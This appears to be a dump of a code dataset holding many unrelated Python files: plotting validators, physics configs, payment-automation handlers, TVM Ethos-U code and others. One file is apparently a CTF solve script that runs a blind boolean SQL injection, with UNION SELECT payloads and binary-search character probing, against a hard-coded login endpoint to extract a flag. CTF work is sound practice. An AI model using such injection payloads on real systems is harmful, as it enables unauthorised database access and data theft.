blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
94dc0ef50431d5665ad51b9387ffe5fc79253c51 | 553ab825f7d44def36c092d544a7bb6c9bc52881 | /Best_Maximum_Probability.py | c8c405c3f86b06122c3a1175939676817677a322 | [] | no_license | OzzyTao/TrajectorySmoothing | f8c898ed777dee860286f004200a1674753d538c | f1771fbe2c6719bcca56c4c6942ced6b375dcf30 | refs/heads/master | 2020-04-20T18:51:14.019699 | 2015-08-07T02:54:55 | 2015-08-07T02:54:55 | 40,339,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | from sta import Test
import pickle
import csv
path = 'f:/London/statistics/'
names = ['RMSE','TRMSE','area','CLength','RMSE_Rank','TRMSE_Rank','area_Rank','CLength_Rank']
# K values
fields = ['30s','40s','50s','60s','90s','120s','150s']
seconds = [30,40,50,60,90,120,150]
suffix = 'econds101test.p'
binaryfiles=[field+suffix for field in fields[:-1]]+['150seconds111test.p']
# binaryfiles = ['60seconds115test10k.p','60seconds101test20k.p','60seconds115test30k.p','60seconds115test50k.p','60seconds101test.p','60seconds115test150k.p']
typetest = []
for file in binaryfiles:
with open(path+file,'rb') as binary:
typetest.append(pickle.load(binary))
for name in names[:4]:
with open(path+'best_rank/'+name+'_max.csv','wb') as csvfile:
mywriter = csv.writer(csvfile,delimiter=',')
mywriter.writerow(['seconds','rank','probability'])
for i in range(7):
second = seconds[i]
tests = typetest[i]
for testid in range(100):
best_rank=tests[testid].best_ranking(name)
top_rank=tests[testid].best_ranking('possibility')
mywriter.writerow((second,best_rank['possibility_Rank'],top_rank['possibility']))
| [
"ozzytao@Ozzys-MacBook-Pro.local"
] | ozzytao@Ozzys-MacBook-Pro.local |
53acf8afba1dca047ee2e925f727f123b6ae6295 | a94aee74f2c29e51d8740ac7ee336fcc4aeb408d | /2021/SecureBugCTF/blind_flagger_solve.py | b4872629b7e0b2eecf138f233f4facde4e6c0f0f | [] | no_license | CTF-STeam/ctf-writeups | c2103d66f315057f4eba527a2bc335248bf49c7f | 2f5532207db3d9f721d294bacaec6cd56c4ec752 | refs/heads/master | 2023-06-30T10:16:46.885305 | 2021-08-08T14:59:50 | 2021-08-08T14:59:50 | 290,140,012 | 5 | 4 | null | 2021-08-07T12:18:50 | 2020-08-25T07:03:45 | Python | UTF-8 | Python | false | false | 1,410 | py | import requests
BASE_URL = 'http://18.194.166.81:3334/old-login'
def tryUrl(param, pos):
url = BASE_URL
# CREATE TABLE flag (FlaggedFlag T
#post_data = {'uname': 'admin', 'psw': "' or 1=2 union select 1,tbl_name from sqlite_master where tbl_name='flag' and hex(substr(sql," + str(pos + 1) + ",1)) >= hex('" + param + "');--" }
post_data = {'uname': 'admin', 'psw': "' or 1=2 union select 1,FlaggedFlag from flag where hex(substr(FlaggedFlag," + str(pos + 1) + ",1)) >= hex('" + param + "');--" }
print(post_data)
response = requests.post(url, data=post_data, allow_redirects=False)
#print(response.content)
if b'did' in response.content:
return True
else:
return False
def probeNextColChar(pos):
lowGuessIndex = 32
highGuessIndex = 126
while lowGuessIndex < highGuessIndex:
guessIndex = lowGuessIndex + (highGuessIndex - lowGuessIndex) // 2;
guess = chr(guessIndex)
if tryUrl(guess, pos):
if lowGuessIndex == guessIndex:
return guess
lowGuessIndex = guessIndex
else:
highGuessIndex = guessIndex
return False
#nextChar = probeNextColChar(4)
#print(nextChar)
flag = ''
pos = 0
while True:
nextChar = probeNextColChar(pos)
if not nextChar:
break
flag += nextChar
pos += 1
print("flag so far:", flag)
print(flag)
| [
"chinhnt2k3@gmail.com"
] | chinhnt2k3@gmail.com |
fe98cd8e2fe048a0813b442454d71bc1d015a7fc | acf7457d3a799cb9bff12686d2d616688bcd4b5b | /packages/python/plotly/plotly/validators/heatmap/legendgrouptitle/font/_color.py | 992adc73b123157b72fc2cd128fd797dbab38c2d | [
"MIT"
] | permissive | plotly/plotly.py | f4f61639f08160f16195efc95b5901dc5a937346 | 975a704074f01c078e0fdfa32bdf17130bf89e69 | refs/heads/master | 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 | MIT | 2023-09-08T19:55:32 | 2013-11-21T05:53:08 | Python | UTF-8 | Python | false | false | 427 | py | import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="color", parent_name="heatmap.legendgrouptitle.font", **kwargs
):
super(ColorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "style"),
**kwargs,
)
| [
"nicolas@plot.ly"
] | nicolas@plot.ly |
c71f56ec55e2469b4b7274175bf4d6fdd17517ea | 949633cd7f09a68b19304af14562b29514261ecc | /Validation/MuonGEMHits/python/SingleMuPt2-50Fwd_cfi.py | b7313215de37fa11c0b02cf416e409849712d915 | [] | permissive | gsfs/cmssw | eabfe97b0594287ce25556e6b091956b72baad72 | fdbcb59c16cafd2a9b56177064bc0b6b93cc51dc | refs/heads/CMSSW_8_0_X | 2021-01-21T23:41:29.108786 | 2019-04-11T16:11:14 | 2019-04-11T16:11:14 | 226,406,411 | 0 | 0 | Apache-2.0 | 2019-12-06T20:39:25 | 2019-12-06T20:39:24 | null | UTF-8 | Python | false | false | 526 | py | import FWCore.ParameterSet.Config as cms
generator = cms.EDProducer("FlatRandomPtGunProducer",
PGunParameters = cms.PSet(
MaxPt = cms.double(50.0),
MinPt = cms.double(2.0),
PartID = cms.vint32(-13),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(-4.5),
MaxEta = cms.double(4.5)
),
Verbosity = cms.untracked.int32(0),
psethack = cms.string('single mu pt 40 forward'),
AddAntiParticle = cms.bool(True),
firstRun = cms.untracked.uint32(1)
)
| [
"ry840901@gmail.com"
] | ry840901@gmail.com |
b104bc898e027c3443ab38096375afb2acb94686 | 9da8754002fa402ad8e6f25659978bd269bbcec8 | /src/25B/cdf_25B.py | 1a7bf3d9cd25f7a4eea1b9be350dfa6db25c93c0 | [
"MIT"
] | permissive | kopok2/CodeforcesSolutionsPython | a00f706dbf368ba0846c8ae86d4145b5dd3e1613 | 35bec0dbcff47765b123b5fe60476014376153df | refs/heads/master | 2023-02-02T03:08:22.097651 | 2020-12-17T22:00:50 | 2020-12-17T22:00:50 | 196,035,812 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | class CodeforcesTask25BSolution:
def __init__(self):
self.result = ''
self.n = 0
self.number = ''
def read_input(self):
self.n = int(input())
self.number = input()
def process_task(self):
result = []
if self.n % 2:
result.append(self.number[:3])
self.number = self.number[3:]
a = ""
for c in self.number:
if a:
result.append(a + c)
a = ""
else:
a = c
self.result = "-".join(result)
def get_result(self):
return self.result
if __name__ == "__main__":
Solution = CodeforcesTask25BSolution()
Solution.read_input()
Solution.process_task()
print(Solution.get_result())
| [
"oleszek.karol@gmail.com"
] | oleszek.karol@gmail.com |
8074f01904bff39c1ebfd7683a6d575784de2172 | e0fc7493f4339145792f54bcd7124acea500ca45 | /cpc/utils/ErrorHandler.py | a4971a3eda2ee541bbc19b681e53610fa2d843b3 | [
"BSD-3-Clause"
] | permissive | U-Ar/Cpresto | d52d99e8d44ed01c87c8911614d744cae695d6aa | f723458fb237c9e3e8bc8a6afdf7c81858a65363 | refs/heads/main | 2023-05-14T15:28:38.449783 | 2021-06-06T15:07:14 | 2021-06-06T15:07:14 | 364,445,894 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | import sys
class ErrorHandler:
def __init__(self,progid,stream=None):
if stream == None:
self.stream = sys.stderr
else:
self.stream = stream
self.program_id = progid
self.n_error = 0
self.n_warning = 0
def error(self,msg,loc=None):
if loc == None:
self.stream.write(self.program_id+": error: "+msg+"\n")
self.n_error += 1
else :
self.stream.write(self.program_id+": error: "+loc.to_string()+": "+msg+"\n")
self.n_error += 1
def warn(self,msg,loc=None):
if loc == None:
self.stream.write(self.program_id+": warning: "+msg+"\n")
self.n_warning += 1
else :
self.stream.write(self.program_id+": warning: "+loc.to_string()+": "+msg+"\n")
self.n_warning += 1
def error_occured(self):
return self.n_error > 0 | [
"yuma.arakawa82128awakara.amuy@gmail.com"
] | yuma.arakawa82128awakara.amuy@gmail.com |
f7442f8c645cd183f3dec599c63d35e07280fb9a | d8e66e769e8f9b797d45ce3cfc01eb43d97eafad | /app/targetbalance.py | 0868084558cf89fd331bb9203be2e9f26f50583b | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | mvdwerve/bunq2ifttt | 34d2d76fa4c4049795237c0c2df855d70b1557c4 | de53ca03743b705c4f5149c756e0fd90d55231ee | refs/heads/master | 2022-11-29T06:20:58.048869 | 2020-08-02T16:34:38 | 2020-08-02T16:34:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,540 | py | """
Target balance
Handles the target balance internal/external actions
"""
import json
import uuid
from flask import request
import bunq
import payment
def target_balance_internal():
""" Execute a target balance internal action """
data = request.get_json()
print("[target_balance_internal] input: {}".format(json.dumps(data)))
if "actionFields" not in data:
errmsg = "missing actionFields"
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
fields = data["actionFields"]
errmsg = check_fields(True, fields)
if errmsg:
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# the account NL42BUNQ0123456789 is used for test payments
if fields["account"] == "NL42BUNQ0123456789":
return json.dumps({"data": [{"id": uuid.uuid4().hex}]})
# retrieve balance
config = bunq.retrieve_config()
if fields["payment_type"] == "DIRECT":
balance = get_balance(config, fields["account"],
fields["other_account"])
if isinstance(balance, tuple):
balance, balance2 = balance
transfer_amount = fields["amount"] - balance
if transfer_amount > balance2:
transfer_amount = balance2
else:
balance = get_balance(config, fields["account"])
if isinstance(balance, float):
transfer_amount = fields["amount"] - balance
if isinstance(balance, str):
errmsg = balance
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# construct payment message
if "{:.2f}".format(fields["amount"]) == "0.00":
errmsg = "No transfer needed, balance already ok"
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
if transfer_amount > 0 and "top up" in fields["direction"]:
paymentmsg = {
"amount": {
"value": "{:.2f}".format(transfer_amount),
"currency": "EUR"
},
"counterparty_alias": {
"type": "IBAN",
"value": fields["account"],
"name": "x"
},
"description": fields["description"]
}
account = fields["other_account"]
elif transfer_amount < 0 and "skim" in fields["direction"]:
paymentmsg = {
"amount": {
"value": "{:.2f}".format(-transfer_amount),
"currency": "EUR"
},
"counterparty_alias": {
"type": "IBAN",
"value": fields["other_account"],
"name": "x"
},
"description": fields["description"]
}
account = fields["account"]
else:
errmsg = "No transfer needed, balance already ok"
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
print(paymentmsg)
# get id and check permissions
if fields["payment_type"] == "DIRECT":
accid, enabled = payment.check_source_account(True, False, config,
account)
else:
accid, enabled = payment.check_source_account(False, True, config,
account)
if accid is None:
errmsg = "unknown account: "+account
if not enabled:
errmsg = "Payment type not enabled for account: "+account
if errmsg:
print("[target_balance_internal] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# execute the payment
if fields["payment_type"] == "DIRECT":
result = bunq.post("v1/user/{}/monetary-account/{}/payment"
.format(config["user_id"], accid), paymentmsg)
else:
paymentmsg = {"number_of_required_accepts": 1, "entries": [paymentmsg]}
result = bunq.post("v1/user/{}/monetary-account/{}/draft-payment"
.format(config["user_id"], accid), paymentmsg)
print(result)
if "Error" in result:
return json.dumps({"errors": [{
"status": "SKIP",
"message": result["Error"][0]["error_description"]
}]}), 400
return json.dumps({"data": [{
"id": str(result["Response"][0]["Id"]["id"])}]})
def target_balance_external():
""" Execute a target balance external action """
data = request.get_json()
print("[target_balance_external] input: {}".format(json.dumps(data)))
if "actionFields" not in data:
errmsg = "missing actionFields"
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
fields = data["actionFields"]
errmsg = check_fields(False, fields)
if errmsg:
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# the account NL42BUNQ0123456789 is used for test payments
if fields["account"] == "NL42BUNQ0123456789":
return json.dumps({"data": [{"id": uuid.uuid4().hex}]})
# retrieve balance
config = bunq.retrieve_config()
balance = get_balance(config, fields["account"])
if isinstance(balance, str):
errmsg = balance
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
transfer_amount = fields["amount"] - balance
# check for zero transfer
if "{:.2f}".format(fields["amount"]) == "0.00":
errmsg = "No transfer needed, balance already ok"
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# get account id and check permission
if transfer_amount > 0:
accid = None
for acc in config["accounts"]:
if acc["iban"] == fields["account"]:
accid = acc["id"]
enabled = False
if "permissions" in config:
if fields["account"] in config["permissions"]:
if "PaymentRequest" in config["permissions"]\
[fields["account"]]:
enabled = config["permissions"][fields["account"]]\
["PaymentRequest"]
else:
accid, enabled = payment.check_source_account(False, True, config,
fields["account"])
if accid is None:
errmsg = "unknown account: "+fields["account"]
if not enabled:
errmsg = "Not permitted for account: "+fields["account"]
if errmsg:
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
# send request / execute payment
if transfer_amount > 0 and "top up" in fields["direction"]:
bmvalue = fields["request_phone_email_iban"].replace(" ", "")
if "@" in bmvalue:
bmtype = "EMAIL"
elif bmvalue[:1] == "+" and bmvalue[1:].isdecimal():
bmtype = "PHONE_NUMBER"
elif bmvalue[:2].isalpha() and bmvalue[2:4].isdecimal():
bmtype = "IBAN"
else:
errmsg = "Unrecognized as email, phone or iban: "+bmvalue
print("[request_inquiry] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message":\
errmsg}]}), 400
msg = {
"amount_inquired": {
"value": "{:.2f}".format(transfer_amount),
"currency": "EUR",
},
"counterparty_alias": {
"type": bmtype,
"name": bmvalue,
"value": bmvalue
},
"description": fields["request_description"],
"allow_bunqme": True,
}
print(json.dumps(msg))
config = bunq.retrieve_config()
result = bunq.post("v1/user/{}/monetary-account/{}/request-inquiry"\
.format(config["user_id"], accid), msg, config)
elif transfer_amount < 0 and "skim" in fields["direction"]:
paymentmsg = {
"amount": {
"value": "{:.2f}".format(-transfer_amount),
"currency": "EUR"
},
"counterparty_alias": {
"type": "IBAN",
"value": fields["payment_account"],
"name": fields["payment_name"]
},
"description": fields["payment_description"]
}
print(paymentmsg)
paymentmsg = {"number_of_required_accepts": 1, "entries": [paymentmsg]}
result = bunq.post("v1/user/{}/monetary-account/{}/draft-payment"
.format(config["user_id"], accid), paymentmsg)
else:
errmsg = "No transfer needed, balance already ok"
print("[target_balance_external] ERROR: "+errmsg)
return json.dumps({"errors": [{"status": "SKIP", "message": errmsg}]})\
, 400
print(result)
if "Error" in result:
return json.dumps({"errors": [{
"status": "SKIP",
"message": result["Error"][0]["error_description"]
}]}), 400
return json.dumps({"data": [{
"id": str(result["Response"][0]["Id"]["id"])}]})
def check_fields(internal, fields):
""" Check the fields """
# check expected fields
if internal:
expected_fields = ["account", "amount", "other_account", "direction",
"payment_type", "description"]
else:
expected_fields = ["account", "amount", "direction", "payment_account",
"payment_name", "payment_description",
"request_phone_email_iban", "request_description"]
for field in expected_fields:
if field not in fields:
return "missing field: "+field
# strip spaces from account numbers
fields["account"] = fields["account"].replace(" ", "")
if internal:
fields["other_account"] = fields["other_account"].replace(" ", "")
else:
fields["payment_account"] = fields["payment_account"].replace(" ", "")
# check amount
try:
orig = fields["amount"]
fields["amount"] = float(fields["amount"])
except ValueError:
fields["amount"] = -1
if fields["amount"] <= 0:
return "only positive amounts allowed: "+orig
return None
def get_balance(config, account, account2=None):
""" Retrieve the balance of one or two accounts """
balances = bunq.retrieve_account_balances(config)
if account2 is None and account in balances:
return balances[account]
if account in balances and account2 in balances:
return balances[account], balances[account2]
if account not in balances:
return "Account balance not found "+account
return "Account balance not found "+account2
| [
"edwin@woudt.nl"
] | edwin@woudt.nl |
5496783d37eedd3abd8679c0d29be881d4a588ee | 2cb7bad8855b56b4ea944ee54f6f82e7ff3adf74 | /project/janamat/wsgi.py | 3e976f6cadf3729b37aea1bbcc574aedada494b4 | [] | no_license | Swagoto97/MyBlog | eb41918276ce67c2feaba9d7e3e3749adfc45cc0 | c20f7da0f539f26d6fb55e1a301391ad8f3948a4 | refs/heads/master | 2023-06-29T00:06:00.295102 | 2021-07-26T11:20:57 | 2021-07-26T11:20:57 | 389,607,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | """
WSGI config for janamat project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'janamat.settings')
application = get_wsgi_application()
| [
"swagoto2sadhukhan@gmail.com"
] | swagoto2sadhukhan@gmail.com |
296423ec24b4780fed4d00720f1a842756b38435 | fc83aabda5c74f4a07c7003cf1257680400515f0 | /venv/Scripts/pip3-script.py | 871cdcbd9ede1f4f0ccd7aa4c5516098a0c4fa08 | [] | no_license | pirak3/Inklok | 473f3dd1df4f522f85e721c19d76b970585d56f4 | 01c0051fa1eae317e8abce4796206b6fa2d02f8e | refs/heads/master | 2020-03-10T18:07:33.261817 | 2018-04-14T13:10:27 | 2018-04-14T13:10:27 | 129,517,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!D:\Inklok\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip3')()
)
| [
"joepvanhulst10@gmail.com"
] | joepvanhulst10@gmail.com |
b15ceb94e2e8826bd4fc55a98f1ca8ab21c75907 | 170c3632b340871fb9f82ff1bde91b23f3700224 | /recommenders/hybrid_recommender.py | a655093669dc4ba0f9a732fac605db128f9c8400 | [] | no_license | predictory/predictory-api | 7c3d24aea677ed2674e8e1bb55ef055231878d6a | a7118cced3d941f7d2283f3945234346c15e1adb | refs/heads/master | 2021-06-18T05:58:53.493560 | 2019-11-07T08:58:31 | 2019-11-07T08:58:31 | 158,552,092 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,307 | py | from models.weighted_hybrid_recommender import WeightedHybridRecommender
from models.switched_hybrid_recommender import SwitchedHybridRecommender
class HybridRecommender:
@staticmethod
def get_recommendations(user_id, movie_id, hybrid_type='weighted', take=10, skip=0, genres=None, movie_type=None,
rec_type='svd', sim_type='cosine', sim_source='tf-idf',
order_by=['rating', 'similarity', 'es_score']):
if hybrid_type == 'switched':
recommendations = HybridRecommender.get_switched_recommendations(user_id, movie_id, take, skip, genres,
movie_type, rec_type, sim_type, sim_source,
order_by)
else:
recommendations = HybridRecommender.get_weighted_recommendations(user_id, movie_id, take, skip, genres,
movie_type, rec_type, sim_type, sim_source,
order_by)
recommendations = {
'userId': user_id,
'movieId': movie_id,
'recommendations': recommendations
}
return recommendations
@staticmethod
def get_weighted_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type, sim_type, sim_source,
order_by):
recommender = WeightedHybridRecommender()
recommendations = recommender.get_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type,
sim_type, sim_source, order_by)
return recommendations
@staticmethod
def get_switched_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type, sim_type, sim_source,
order_by):
recommender = SwitchedHybridRecommender()
recommendations = recommender.get_recommendations(user_id, movie_id, take, skip, genres, movie_type, rec_type,
sim_type, sim_source, order_by)
return recommendations
| [
"fojtik.v@gmail.com"
] | fojtik.v@gmail.com |
fad8543b40ac46027cd320c773ff3ad6eefd9be4 | a7f04883ebfc5d22172da939d72624a52c8632c1 | /post/migrations/0003_auto_20200326_0551.py | 7de2715a163b28c3d7cae586e2277079dc338141 | [] | no_license | almaaesh/ads | 2782b59ac65075e817634b3dea96050218b78932 | caf2df2c3e60c8475e90aa5457943283c73a3b10 | refs/heads/master | 2022-11-30T05:32:57.227143 | 2020-04-08T04:05:24 | 2020-04-08T04:05:24 | 253,975,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.1.2 on 2020-03-26 02:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0002_auto_20200326_0540'),
]
operations = [
migrations.AlterField(
model_name='product',
name='slug_ar',
field=models.SlugField(allow_unicode=True, blank=True, max_length=250, null=True, verbose_name='Slug Ar'),
),
]
| [
"BASSAM@Administrator.kfupm.edu.sa"
] | BASSAM@Administrator.kfupm.edu.sa |
a0ef8d57867120d76e7dd3c1b572137bdeb51bf6 | f7550c4964dc8f3c59dbcebe39e947bd6a264dba | /2.OOPS/Exception Handling.py | 05dac8b2c108980738fc273289f4f8795461eb72 | [] | no_license | Jashwanth-k/Data-Structures-and-Algorithms | db5e2e30932e0a35db578c19ae6cff9f147b7c3d | 1ebf9986999a474cb094f3ab04616a46f2887043 | refs/heads/main | 2023-08-25T02:57:17.394322 | 2021-10-11T15:27:56 | 2021-10-11T15:27:56 | 402,448,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | while True:
try:
n = int(input('enter the numerator :'))
num = int(n)
n = int(input('enter the denominator :'))
denom = int(n)
value = (num / denom)
print(value)
break
except ValueError:
print('Numerator and Denominator must be integers')
| [
"noreply@github.com"
] | Jashwanth-k.noreply@github.com |
9404e5e1138ec41fc2bad63449226d1cd0cc38c6 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v4/services/domain_category_service_client_config.py | db4f358f4636c9982c5622eefbd7626ab8796369 | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | false | 815 | py | config = {
"interfaces": {
"google.ads.googleads.v4.services.DomainCategoryService": {
"retry_codes": {
"idempotent": [
"DEADLINE_EXCEEDED",
"UNAVAILABLE"
],
"non_idempotent": []
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 5000,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 3600000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 3600000,
"total_timeout_millis": 3600000
}
},
"methods": {
"GetDomainCategory": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default"
}
}
}
}
}
| [
"noreply@github.com"
] | fiboknacky.noreply@github.com |
479b17c3595be8900b8bb765f60ad7f41ff8a5ad | c09a78a4fc5e7c82291538f3437d50591903f45f | /python/tvm/relay/op/contrib/ethosu.py | 806bf6dce2e89814b248c5246797995b799a3af2 | [
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | UofT-EcoSystem/tvm | 1dcdffb9069a003376bc54ad82640616956a80b6 | 6d6e0705873b0b64576127fd6038720ef6c9c338 | refs/heads/main | 2022-08-31T11:00:02.757303 | 2022-06-25T12:03:47 | 2022-06-25T12:03:47 | 393,457,696 | 0 | 1 | Apache-2.0 | 2021-08-06T17:51:12 | 2021-08-06T17:51:11 | null | UTF-8 | Python | false | false | 64,740 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=ungrouped-imports, import-outside-toplevel
"""Arm(R) Ethos(TM)-U NPU supported operators."""
import functools
from typing import Dict, List, Tuple, Callable, Optional
import numpy as np # type: ignore
import tvm # type: ignore
from tvm import relay
from tvm.relay.expr import Constant, Call # type: ignore
from tvm.relay.op.contrib.register import register_pattern_table # type: ignore
from tvm.relay.dataflow_pattern import wildcard, is_op, is_constant, is_tuple # type: ignore
from tvm.relay.build_module import bind_params_by_name # type: ignore
try:
# As ethos-u-vela package is an optional TVM dependency, we want to lazy load it
# and check whether it is installed or not.
#
# In order to show the appropriate error messages when we try to invoke code that
# rely on imports from ethos-u-vela, we protect them with the decorator @requires_vela
# implemented below.
from ethosu.vela import api as vapi # type: ignore
except ImportError:
vapi = None
def requires_vela(func):
"""Decorator to check whether we have the required dependency ethos-u-vela
installed as a python package"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not vapi:
raise ImportError(
"The 'ethos-u-vela' python package is required for the Arm(R) Ethos(TM)-U NPU "
"backend. Please install the dependency using your Python package manager."
) from None
return func(*args, **kwargs)
return wrapper
class TensorParams:
"""
This class will parse a tvm Expr along with quantization scale
and zero point to populate parameters that are required
for the creation of tensors in Vela.
"""
@requires_vela
def __init__(self, tensor, layout=None, scale=None, zero_point=None):
self.tensor = tensor
if isinstance(tensor, Constant):
self.values = tensor.data.asnumpy()
else:
self.values = None
self.dtype = tensor.checked_type.dtype
self.shape = [int(i) for i in tensor.checked_type.shape]
self.layout = layout
if scale is not None and zero_point is not None:
self.q_params = vapi.NpuQuantization(
scale.data.asnumpy().astype("float32"), zero_point.data.asnumpy().astype(self.dtype)
)
else:
# put default values
self.q_params = vapi.NpuQuantization(1.0, 0)
def check_strides(strides: List[int], stride_range=None) -> bool:
"""This function checks whether strides are within the limits supported by the NPU"""
if stride_range is None:
stride_range = (1, 3)
smin, smax = stride_range
if not smax >= strides[0] >= smin:
return False
if not smax >= strides[1] >= smin:
return False
return True
def check_valid_dtypes(tensor_params: List[TensorParams], supported_dtypes: List[type]) -> bool:
"""This function checks whether dtypes are supported by the NPU"""
for tep in tensor_params:
# Check for dtypes
if np.dtype(tep.dtype) not in supported_dtypes:
return False
# Check for shape sizes
if any(dimlen > 65536 for dimlen in tep.shape):
return False
return True
def check_weights(weights: TensorParams, dilation: List[int]):
"""This function checks whether weight tensor is compatible with the NPU"""
from tvm.relay.backend.contrib.ethosu.util import get_dim_value
dilated_height_range = (1, 64)
dilated_hxw_range = (1, 64 * 64)
weights_limit = 127 * 65536
dilated_width = (weights.shape[get_dim_value(weights.layout, "W")] - 1) * dilation[0] + 1
dilated_height = (weights.shape[get_dim_value(weights.layout, "H")] - 1) * dilation[1] + 1
dh_min, dh_max = dilated_height_range
if not dh_min <= dilated_height <= dh_max:
return False
dilated_hxw = dilated_height * dilated_width
dhxw_min, dhxw_max = dilated_hxw_range
if not dhxw_min <= dilated_hxw <= dhxw_max:
return False
# A saturation upper bound check for accumulators
weights.values = weights.values - weights.q_params.zero_point
axis = (
get_dim_value(weights.layout, "H"),
get_dim_value(weights.layout, "W"),
get_dim_value(weights.layout, "I"),
)
sum_weights = np.amax(np.sum(np.absolute(weights.values), axis=axis))
return sum_weights <= weights_limit
def check_bias(bias: TensorParams):
"""This function checks whether the bias values fit in 40 bits"""
if bias and bias.dtype == np.dtype("int64"):
valid = all(len(bin(bias_value)[2:]) <= 40 for bias_value in bias.values)
return valid
return True
def check_batch_size(ifm: TensorParams):
"""This function checks for the number of batches vela currently supports"""
return ifm.shape[0] == 1
def check_dilation(dilation: List[int], dilation_range=None):
"""This function checks whether dilation is within the limits supported by the NPU"""
if dilation_range is None:
dilation_range = (1, 2)
dmin, dmax = dilation_range
if not dmin <= dilation[0] <= dmax:
return False
if not dmin <= dilation[1] <= dmax:
return False
return True
def check_padding(padding: List[int], bounds: List[int]):
